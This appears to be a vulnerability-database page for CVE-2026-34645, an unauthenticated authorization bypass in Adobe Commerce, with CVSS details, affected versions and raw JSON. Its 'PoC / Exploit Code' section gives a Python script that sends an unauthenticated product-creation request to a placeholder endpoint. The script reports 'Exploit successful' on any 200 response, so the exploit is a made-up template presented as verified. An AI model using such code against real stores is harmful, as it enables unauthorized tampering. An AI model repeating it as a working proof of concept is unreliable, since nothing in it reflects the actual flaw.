Security Vulnerability Report
中文
CVE-2026-34645 CVSS 7.5 HIGH

CVE-2026-34645

Published: 2026-05-12 20:16:35
Last Modified: 2026-05-13 14:49:12
Source: [email protected]

Description

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Adobe Commerce <= 2.4.9-beta1
Adobe Commerce <= 2.4.8-p4
Adobe Commerce <= 2.4.7-p9
Adobe Commerce <= 2.4.6-p14
Adobe Commerce <= 2.4.5-p16
Adobe Commerce <= 2.4.4-p17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-34645: Adobe Commerce Incorrect Authorization # Description: Exploits incorrect authorization to gain unauthorized write access. import requests def exploit(target_url): # The vulnerable endpoint might vary based on the specific implementation # This is a generic example targeting an API endpoint that should be protected endpoint = f"{target_url}/rest/V1/vulnerable/endpoint" headers = { "Content-Type": "application/json", "User-Agent": "CVE-2026-34645-Exploit" } # Payload attempting to write unauthorized data payload = { "product": { "name": "Malicious Product", "price": 0, "status": 1 } } try: print(f"[+] Sending exploit request to {endpoint}...") # No authentication token is sent due to PR:N (No Privileges Required) response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Unauthorized write access confirmed.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status Code: {response.status_code}") print(f"[-] Response: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with actual target exploit(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34645", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:35.423", "lastModified": "2026-05-13T14:49:11.830", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized write access. Exploitation of this issue does not require user interaction."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://helpx.adobe.com/security/products/magento/apsb26-49.html", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.